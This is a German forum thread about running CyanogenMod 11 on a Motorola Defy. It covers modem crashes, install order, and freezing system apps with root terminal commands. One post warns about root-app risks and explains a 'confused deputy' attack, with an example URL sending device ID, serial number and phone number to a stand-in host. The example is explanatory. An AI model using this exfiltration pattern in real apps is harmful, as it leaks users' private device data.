[ROM] CyanogenMod 11.0 (Android 4.4.4)

  • 8.263 Antworten
  • Neuester Beitrag
Diskutiere [ROM] CyanogenMod 11.0 (Android 4.4.4) im Custom-ROMs für Motorola Defy+ im Bereich Root / Hacking / Modding für Motorola Defy+.
Hadrrr

Hadrrr

Fortgeschrittenes Mitglied
Gibt es aktuell eine Lösung für das Modem Problem? Bei mir erscheint der Fehler mit dem Countdown und der Aufforderung zum Neustart seit der Installation gestern Abend schon zum dritten Mal.

Eine Clock App (com.cyanogenmod.lockclock) zum Deaktivieren, wie in dem Wiki beschrieben, habe ich bei dem aktuellen Build nicht gefunden. Ist vielleicht die Uhr App (com.android.deskclock) gemeint? Durch Deaktivieren dieser ist jedoch der Wecker nicht mehr verfügbar, was die Nutzung des Telefons schon sehr einschränkt.

Habe den Build von hier aktuell drauf: Quarx2k Firmwares.

Dr. Bob Baldachin schrieb:
Mein Rechner hat nur USB 3.0...
Das ist mir gestern beim flashen auch aufgefallen. RSD oder das Defy scheinen, zumindest unter Windows 10, nicht mit USB 3 zu funktionieren. Zum Glück hat mein alter Rechner auch noch USB 2.0, da ging es ohne Probleme.
 
Zuletzt bearbeitet:
O

ooo

Lexikon
Das Modem Problem wird kleiner mit nur 2G an (keine optimale Lösung, klar).
cLock (die CM App) ist bereits seit Monaten (26.10.2014) nicht mehr in den Quarx-Nightlies enthalten.
com.android.deskclock nicht deaktivieren, das sind unterschiedliche Apps.
Der zugehörige Wiki-Tipp kann für neue Nightlies ignoriert werden.
 
Dr. Bob Baldachin

Dr. Bob Baldachin

Erfahrenes Mitglied
Seit ich mit der Stock Rom zurück bin und nochmal von vorn (100% an die Checklist.txt gehalten) begonnen habe sind bei mir die Reboots nicht mehr aufgetaucht. Ich instaliere die apps jetzt nach und nach. Modem Probleme habe ich keine
Bis jetzt installiert :

Gapps pico

No Wallpaper
Smart AudioBook Player
Smooth Calendar
Standheizungsapp
WhatsApp Messenger

CM Updater deaktiviert
 
Hadrrr

Hadrrr

Fortgeschrittenes Mitglied
ooo schrieb:
Das Modem Problem wird kleiner mit nur 2G an (keine optimale Lösung, klar).
cLock (die CM App) ist bereits seit Monaten (26.10.2014) nicht mehr in den Quarx-Nightlies enthalten.
com.android.deskclock nicht deaktivieren, das sind unterschiedliche Apps.
Der zugehörige Wiki-Tipp kann für neue Nightlies ignoriert werden.
Habe bisher nur Wlan benutzt und mobile Daten deaktiviert. Scheint bei mir also nicht mit dem mobilen Internet zu tun zu haben. Ein paar mal hat das Defy jetzt auch einfach so ohne Vorwarnung neugestartet.

Dr. Bob Baldachin schrieb:
Seit ich mit der Stock Rom zurück bin und nochmal von vorn (100% an die Checklist.txt gehalten) begonnen habe sind bei mir die Reboots nicht mehr aufgetaucht. Ich instaliere die apps jetzt nach und nach. Modem Probleme habe ich keine
Bis jetzt installiert :

Gapps pico

No Wallpaper
Smart AudioBook Player
Smooth Calendar
Standheizungsapp
WhatsApp Messenger

CM Updater deaktiviert
Mach es eigentlich einen Unterschied ob man Gapps erst nach einem Neustart und Ersteinrichtung installiert, oder direkt nach dem Nightlie?

Welche Version hast du genommen?

Habe die vom 14.11 und bin eigentlich auch vom sbf Flash bis Gapps pico nach der Checkliste installiert. Läuft alles recht flott bis auf die gelegentlichen Probleme mit dem Modem.

Gerät ist Defy (Ohne Plus) mit roter Linse.
 
Zuletzt bearbeitet:
O

ooo

Lexikon
Hadrrr schrieb:
Mach es eigentlich einen Unterschied ob man Gapps erst nach einem Neustart und Ersteinrichtung installiert, oder direkt nach dem Nightlie?
Wenn man erst nur die Nightly installiert, kann man sehen (z. B. nach 1 bis 2 Stunden), ob es Probleme/Fehler gibt, die nicht mit den GApps zusammenhängen.
Außerdem kann man bestimmte Einstellungen vornehmen, die die Sicherheit und den Datenschutz erhöhen (Firewall/Ad-Blocker installieren, Apps einfrieren, auch ROM-eigene, wie z. B. Whisperpush, Voice+, CM Konto etc.).
Danach kann man dann die GApps installieren. - Wenn dann Fehler auftreten, kann man diese eher direkt dort zuordnen.
Danach dann normale Apps installieren (nach und nach), wenn man Fehler sucht, um den Fehler besser zuordnen zu können.
___

@elsterkrug & andere: Apps können ja problemlos Megabyte-seitig groß sein, wichtiger ist aber, wieviel RAM = Arbeitsspeicher sie bei Nutzung belegen. - Auch immer mal wieder in der App HWA Einstellung nach Neuinstallationen von Apps mit Neustart schauen, ob da inzwischen neue Haken zu entfernen sind, und wenn ja, ob sie evtl. bleiben müssen: App installieren > Neustart > HWA Einstellung > App gelistet? > Haken entfernen > Neustart > App testen > Haken weglassen oder - bei Fehlverhalten - wieder setzen.

Hangouts ist mit Sicherheit eine mögliche Fehlerquelle, wenn zusammen mit anderen (evtl. auch veralteten) Apps benutzt (Ein Defy hat lächerliche 478 MiB RAM).

Hier einige Defy-User bei der Arbeit ...
_
defy-with-apps-1.png defy-with-apps-2.png defy-with-apps-3.png
 
Zuletzt bearbeitet:
Dr. Bob Baldachin

Dr. Bob Baldachin

Erfahrenes Mitglied
Ich habe die vom 13.11. genutzt.

Defy+ rote Linse
 
O

ooo

Lexikon
Hier einige Defy-User bei der Arbeit ...
_

_
Gemeint sind auch Apps, wie z. B. Facebook, Tapatalk, Skype, Navi-Apps, Games und andere Grafik-intensive Apps ...
 
Zuletzt bearbeitet:
Hadrrr

Hadrrr

Fortgeschrittenes Mitglied
Ich weiß nicht woran es liegt, habe aber seit zwei Tagen keine Probleme mehr mit dem Modem. Plötzliche Systemabstürze mit Neustart blieben auch aus. Das einzige, dass ich seitdem geändert habe war die CyanogenMod-Updates auf Manuell zu setzen. Wie man System Updates und CyanogenMod-Konto komplett deaktiviert habe ich nicht gefunden, aber wenn es daran lag, reicht es ja.
 
O

ooo

Lexikon
Hier gibt es eine Liste der System-Apps, die ich mal eingefroren habe (im ersten SPOILER):
[ROM] CyanogenMod 11.0 (Android 4.4.4) | Seite 377

Den CM Updater kann man in dessen Einstellungen erst auf "Manuell" einstellen und zusätzlich in
  • Einstellungen > Apps > Alle > CyanogenMod-Updater > [ Deaktivieren ]
(Der Menü-Eintrag Einstellungen > Über das Telefon > CyanogenMod-Updates bleibt dann ausgeblendet.)

Um die Apps
  • CyanogenMod-Konto (Package Name: com.cyanogenmod.account)
  • Voice+ (Package Name: org.cyanogenmod.voiceplus)
  • WhisperPush (Package Name: org.whispersystems.whisperpush)
zu deaktivieren (einzufrieren), muss man (mit aktivietern root-Rechten) zum Terminal Emulator greifen:

Terminal Emulator öffnen, dann Eingabe
su
pm disable com.cyanogenmod.account
pm disable org.cyanogenmod.voiceplus
pm disable org.whispersystems.whisperpush
exit
exit
(Das spart ein paar Megabyte RAM und erhöht die Sicherheit. - Nach Updates sind diese Freezes immer noch aktiv.)

Um das wieder zurückzudrehen, macht man das hier:
su
pm enable com.cyanogenmod.account
pm enable org.cyanogenmod.voiceplus
pm enable org.whispersystems.whisperpush
exit
exit
Eigentlich ganz einfach, wenn man es weiß ...
 
Netbook

Netbook

Experte
ooo schrieb:
Um die Apps
  • CyanogenMod-Konto (Package Name: com.cyanogenmod.account)
  • Voice+ (Package Name: org.cyanogenmod.voiceplus)
  • WhisperPush (Package Name: org.whispersystems.whisperpush)
zu deaktivieren (einzufrieren), muss man (mit aktivietern root-Rechten) zum Terminal Emulator greifen:
Nein, muss man nicht. Root setze ich voraus, dann hilft die App "System Apps deinstallieren" (Playstore, Icon ist ein roter Papierkorb auf weissem Grund). Damit geht es wirklich sehr einfach, solange man die deinstallierten Apps im Papierkorb belässt und sie nicht endgültig dort raus löscht, kann man sie jederzeit wieder aktivieren.
 
O

ooo

Lexikon
Eigentlich war die Idee, ganz ohne Zusatz-Apps ans Ziel zu kommen. - Wenn man in dieser App "System Apps deinstallieren" die gelöschten Apps so elegant im Papierkorb hat, was passiert dann, wenn die App "System Apps deinstallieren" selbst wieder (versehentlich) deinstalliert wird? - Ist der Inhalt des Papierkorbs dann noch da oder ist man gef***t? (rhetorische Frage, ich weiß die Antwort)
 
Netbook

Netbook

Experte
Da schaut man einfach mal in den Ordner, den die App anlegt ;-)
 
O

ooo

Lexikon
Und macht dann ohne die entsprechende App und ohne Internet-Zugang was genau, um schnell eine gelöschte, aber benötigte System-App wieder zu restaurieren? - Nochmal: Die Idee ist, wie man sich selbst hilft, wenn keine weiteren Mittel zur Verfügung stehen und man nur auf sein *Wissen* angewiesen ist. - Oder übertrieben gesagt: Man überlebt nicht im Dschungel mit einer noch so tollen Kreditkarte (da sind eigene Fähigkeiten gefragt). - Warum kommst du mit einem (evtl. werbe-verseuchten) Tool (das noch dazu Root benötigt - was macht es so "nebenbei" alles), wenn du die Basics nicht beherrschst?
 
Zuletzt bearbeitet:
Netbook

Netbook

Experte
Ich dachte du wüsstest die Antwort? Mal ausprobiert? Berechtigungen gecheckt? Werbeverseuchung? Wer ohne Adblocker unterwegs ist, kann einen Browser nicht sinnvoll nutzen. CM11 auf dem Defy ohne Root?
Mein lieber ooo, Deine Eitelkeit, Deinen Weg (adb, Terminal etc.) für den einzig richtigen zu halten, bekommt unangenehme Züge. Tatsache ist, das man von einem Defy Stock zu einem Defy Quarx ausser für den ersten Schritt alles weitere bequem mit Apps (2ndInit, SU) und Zips (CM11), die man extern auf eine SD-Karte spielt, erledigen kann, das mag Dir nicht gefallen, ist aber für Laien ggfs die einfachere Lösung. Genauso wie der Papierkorb für Systemapps. Wer den dann löscht - tant pis. Und wer die CM11 (und ev Gapps) als Zip auf der SD-Karte hat (s.o. ;-) kann ja sie einfach neu installieren, passiert ja nix, gelle? Du siehst, es hat durchaus Vorteile, über die SD-Karte zu gehen.
 
O

ooo

Lexikon
<bitching mode on>
Ich schreibe hier mit Nachdruck und aus Überzeugung über Basics (Grundlagen) und biete sachlich belegte Möglichkeiten, zwinge aber niemanden zu seinem Glück. - Wer von uns beiden ein verletztes Ego hat und die Realität ein wenig verzerrt interpretiert, haben wir ja bereits mehrfach an anderer Stelle getestet und verifiziert. - Ich vermisse in deinen Vor-Postings auch einen Link zu einer App mit korrektem Titel und den dokumentativen Screenshots für die Leute, die das gerne alles nachmachen möchten, was du vorschlägst, damit sie sich selbst eine Meinung bilden können.
Ich lese dich aus bestimmten Gründen immer wieder gerne.
Den überlegen grinsenden Smiley hast du übrigens diesmal vergessen. (Kannst du ja nochmal nach-editieren, damit das Image wieder passt)
</bitching mode off>
 
Pizzapeter

Pizzapeter

Erfahrenes Mitglied
Hi Leute, also ich lese euch beide gerne.
Verschiedene Alternativen zu haben ist doch auch prima :thumbup:
Ich habe den "System-App-Entferner" auch installiert, ist auch nur ne App, die ich mit Rechtekontrolle und Firewall gut im Griff habe.... Der Terminal Emulator ist ne Tolle Sache, aber was ich in Zukunft mehr benutzen werde weiß ich noch nicht.

Friede sei mit euch

:cool2:
 
O

ooo

Lexikon
Ich habe jetzt etwas gezögert, aber um ganz sicher zu gehen, beschreibe ich uns nochmal

Das Problem mit einer beliebigen Root-App in Stichpunkten:
  • Voraussetzung ist ein gerootetes Phone (su binary ist installiert, klar) - Also unsere Defy-CM-ROM
  • Mit SuperSU (der App) - oder dem Superuser unter CM - kontrolliert man die Zugriffe auf die su binary durch eine Root-App (User-Anfrage)
  • Wenn man der Root-App dann root-Zugriff gewährt, kann diese UNKONTROLLIERT u. a. folgende Aktionen durchführen:
    • ALLE Daten ALLER Apps lesen, schreiben, löschen
    • Apps programmatisch und Dateien inhaltlich ändern (z. B. Funktionen ändern, Viren/Trojaner injizieren, Fake-Hosts in die hosts-Datei schreiben, Spuren verwischen, Logs löschen etc.)
    • Sich selbst über iptables (auch nur temporär) Zugang zum Internet verschaffen (auch ohne, dass eine Firewall-App das merkt/verhindern kann)
    • Eine Schnittstelle aktivieren (WiFi, Mobile Daten, Bluetooth, NFC etc.)
    • Dadurch beliebige ausgelesene Daten irgendwohin versenden
    • Kontroll-Befehle aus dem Internet erhalten (Malware wird nachgeladen und installiert)
Alle diese Aktionen können ohne weiteres auf dem Phone unbemerkt im Hintergrund ablaufen (z. B. nachts oder bei Screen off).

(Das Argument "Google überprüft alle Apps" lasse ich insofern nicht gelten, weil es bereits viele Zwischenfälle gab und auch der Google Play Store zwar relativ sicher, aber eben nicht ganz sicher ist. - Bei der Anzahl der dort verwalteten Apps ist es schon zeitlich unmöglich alles zu checken und zu finden.)

Deswegen
  • vergibt man einer Root-App nicht permanent die Root-Berechtigung (AFWall+ ist eine Ausnahme)
  • friert man eine nur selten genutzte Root-App nach der Nutzung wieder ein oder deinstalliert diese wieder
  • benutzt man so wenig Root-Apps, wie nur möglich auf dem Phone
  • untersucht man eine Root-App auf deren Verhalten/liest sich schlau im Internet
  • installiert man eine (Root-)App beim geringsten Zweifel/Misstrauen erst gar nicht
  • versucht man, (Root-)Apps zu installieren, zu denen der Source-Code verfügbar ist (selber kompilieren)
___

Auch ungerootet und mit "normalen" Apps (auch ohne internet-Berechtigung) können Daten herausgeschmuggelt werden.

Das geht z. B. mit dem Konzept des "Confused Deputy Problem", bei dem eine rechtelose App einfach einen Intent einer anderen App ausnutzt.

Ein Beispiel ist das Öffnen einer Webseite durch den entsprechenden Intent des Browsers (das ist dann der confused deputy), der ja in das Internet darf.
Dabei werden einfach die zu übertragenden Daten an den URL angehängt:

http://evil-hacker.com/blackbox.send?deviceid=<DEVICEID>&serialno=<SERIALNO>&phonenumber=<PHONENUMBER>

Der Browser denkt sich nichts dabei, öffnet "gerne" den von der App übergebenen URL und übergibt so die darin enthaltenen Daten an den Web-Server. - Der neue Besitzer der Daten freut sich über die Einnahmen daraus ...

(Auch das kann im Hintergrund stattfinden, ohne dass der Browser/dessen GUI geöffnet werden muss.)

Ein weiteres Beispiel ist der beliebte ES File-Explorer: Macht alles, kann alles, ist einfach genial.
Mein Problem mit der App: Man vergibt root, die App lernt mit der Zeit alle möglichen Accounts (Benutzername/Passwort) für LAN (FTP, SMB, SSH) und die Clouds (Google, Dropbox etc.) UND verbindet sich zyklisch mit Baidu (chinesisches Amazon/Google) und irgendeiner IP in der chinesischen Provinz (laut DNS). - Das dann vorgeblich für Checks auf Updates. - Ah, ja. - Tjoa ...
___

Wie man sieht, hat man einfach keine wirkliche Kontrolle und muss immer die Augen aufhalten und so wenig Apps installieren, wie nur möglich (Apps können sich bereits bei der nächsten Aktualisierung auch negativ verändert haben).

Wer das alles nicht so sieht ( @Netbook & friends ), kann das natürlich anders praktizieren - Ich habe kein Problem damit.
 
Zuletzt bearbeitet:
Cua

Cua

Senior-Moderator
Teammitglied
Und nach diesem (wirklich interessanten) Exkurs widmen wir uns bitte wieder der CM11 für das Defy ;)
 
E

elsterkrug

Neues Mitglied
Hallo, habe gestern aufgrund des Artikels meine SU-Berechtigungen mal gecheckt und wollte einer App diese wieder entziehen. Dabei habe ich wohl den falschen Knopf erwischt und statt der SU-Berechtigung den SU geslöscht, jedenfalss taucht Superuser nicht mehr in den Einstellungen auf und Root ist weg. Kann ich jetzt nochmal nachträglich mit Framaroot rooten oder wie bekomme ich das Defy wieder gerootet?


Hat sich erledigt, habe es selbst rausgefunden, musste den Rootzugriff erst wieder aktivieren, der Superuser ist wieder da.
 
Zuletzt bearbeitet:
Dr. Bob Baldachin

Dr. Bob Baldachin

Erfahrenes Mitglied
Ist die nightly vom 14.11 die letzte???